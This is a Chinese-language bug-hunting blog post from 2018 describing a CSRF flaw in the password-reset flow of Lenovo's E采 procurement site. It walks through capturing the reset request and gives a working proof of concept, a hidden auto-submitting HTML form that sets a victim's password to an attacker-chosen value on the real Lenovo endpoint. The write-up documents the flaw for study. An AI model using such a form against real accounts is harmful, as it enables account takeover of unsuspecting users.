漏洞挖掘经验之联想E采存在Csrf漏洞

内部资料,禁止外泄!

危害:当用户点击我( 攻击者 )构造好的Csrf Poc后,他们的密码就会修改成我( 攻击者 )设置好的密码~

先注册两个账号,邮箱分别为 clickjacking@126.com623425849@qq.com,其中 623425849@qq.com 的密码为 12345678aa
这里都按照正常流程操作,在忘记密码处输入用户名clickjacking@126.com

csrf1.png-150.5kB

点下一步,输入邮箱发送过来的验证码.

csrf2.png

点下一步,输入新密码,抓包.

csrf3.png-62kB

将数据包制作成Csrf Poc,如下
1
2
3
4
5
6
7
8
9
<html>
<body>
<form style="display:none;" name="px" method="post" action="http://vip.lenovo.com.cn/Account/ForgotPassword/UpdateForgotPassword">
<input type="hidden" name="newPassword1" value="123456789aa&#126;" />
<input type="hidden" name="newPassword2" value="123456789aa&#126;" />
<input type="hidden" name="next" value="�&#184;&#139;�&#184;&#128;�&#173;&#165;" /></FORM>
<script>document.px.submit();</script>
</body>
</html>
浏览器处打开html文件

csrf5.png-180.1kB

我们再输入原先的密码

csrf6.png-196.3kB

可以看到是失败的

输入新密码123456789aa~

csrf7.png-90.6kB

csrf8.png-88.5kB

发现可以登录,说明Csrf漏洞利用成功

十年寒窗无人问,一举成名天下知
– Cai_Team

本文标题:漏洞挖掘经验之联想E采存在Csrf漏洞

文章作者:一条快乐的咸鱼

作者QQ:623425849

发布时间:2018年06月14日 - 23:06

最后更新:2018年07月10日 - 16:07

原始链接:127.0.0.1/2018/06/14/漏洞挖掘之联想E采存在Csrf漏洞/

许可协议:暂时请不要转载,感谢!!!

坚持写有质量的原创\转载文章,如果您觉得质量不错的话就点击下面按钮打赏我们把~
---------------本文结束感谢您的阅读,喜欢我们的话就加入我们吧~---------------